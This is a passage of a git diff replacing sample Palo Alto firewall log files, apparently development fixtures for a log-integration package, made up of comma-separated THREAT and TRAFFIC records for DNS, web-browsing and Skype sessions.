03:55:23,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:28,1475,1,80,61105,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:52,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-analytics,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:57,883,1,80,60782,0,0,0x200000,tcp,alert,"ga.js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 04:03:55,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:04:00,1965,1,80,61470,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
diff --git a/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-inc-traffic.log b/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-inc-traffic.log
index 70d2804a712..2857446f693 100644
--- a/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-inc-traffic.log
+++ b/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-inc-traffic.log
@@ -1,100 +1,100 @@
-Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
-Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25572,1,54448,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
-Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26208,1,53121,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
-Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,14931,1,59323,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
-Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25544,1,59322,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
-Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 
04:39:58,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25308,1,55766,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26376,1,55072,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25118,1,59207,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26146,1,59209,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:28,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25272,1,59208,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 
04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,24069,1,59318,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26161,1,59206,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:57,26000,1,59205,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,65184,1,56858,80,0,0,0x200000,tcp,allow,1910,1359,551,21,2012/04/10 04:29:54,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26522,1,59314,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26067,1,59313,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26573,1,52139,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26894,1,60592,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 
09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25258,1,57322,53,0,0,0x200000,udp,allow,164,66,98,2,2012/04/10 04:39:26,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25025,1,59204,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26138,1,59203,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,27175,1,59305,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 
04:39:55,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26261,1,64005,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25022,1,58768,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,98.149.55.63,0.0.0.0,0.0.0.0,rule1,crusher,,skype,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24027,1,47752,13069,0,0,0x200000,udp,allow,1008,504,504,16,2012/04/10 04:37:50,125,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,8,8 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26360,1,59304,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26394,1,54533,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:55,192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:55,24917,1,59201,80,0,0,0x200000,tcp,allow,9967,837,9130,20,2012/04/10 04:39:24,1,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,10,10 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,22860,1,59303,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,14146,1,50876,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25876,1,57657,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24910,1,59302,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26862,1,59301,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:22 1,2012/10/30 
09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26222,1,64844,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26329,1,52257,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,8.8.8.8,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25142,1,38796,53,0,0,0x0,udp,allow,206,95,111,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25095,1,59200,80,0,0,0x200000,tcp,allow,1503,597,906,13,2012/04/10 04:39:23,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,50.19.102.116,0.0.0.0,0.0.0.0,rule1,,,paloalto-wildfire-cloud,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,24787,1,48412,443,0,0,0x0,tcp,allow,5817,804,5013,17,2012/04/10 04:39:24,0,computer-and-internet-security,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,10,7 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 
04:39:54,192.168.0.2,65.55.223.19,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25948,1,47752,40026,0,0,0x200000,udp,allow,286,187,99,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,65.55.223.24,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25444,1,47752,40029,0,0,0x200000,udp,allow,978,76,902,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,8.8.8.8,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25349,1,52189,53,0,0,0x0,udp,allow,227,86,141,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25713,1,59300,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,26499,1,54414,53,0,0,0x200000,udp,allow,73,73,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:53,25437,1,59299,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24848,1,60399,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24924,1,59626,53,0,0,0x200000,udp,allow,482,166,316,4,2012/04/10 04:39:22,1,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,2,2 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25899,1,51542,53,0,0,0x200000,udp,allow,196,75,121,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26066,1,54182,53,0,0,0x200000,udp,allow,244,75,169,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24908,1,59199,80,0,0,0x200000,tcp,allow,1548,594,954,13,2012/04/10 04:39:23,0,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7 -Oct 30 09:46:27 1,2012/10/30 
09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25105,1,59198,80,0,0,0x200000,tcp,allow,10135,1005,9130,22,2012/04/10 04:39:21,2,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,11964,1,56856,80,0,0,0x200000,tcp,allow,1918,1363,555,21,2012/04/10 04:29:51,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26502,1,52489,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26338,1,59298,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24919,1,60185,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 
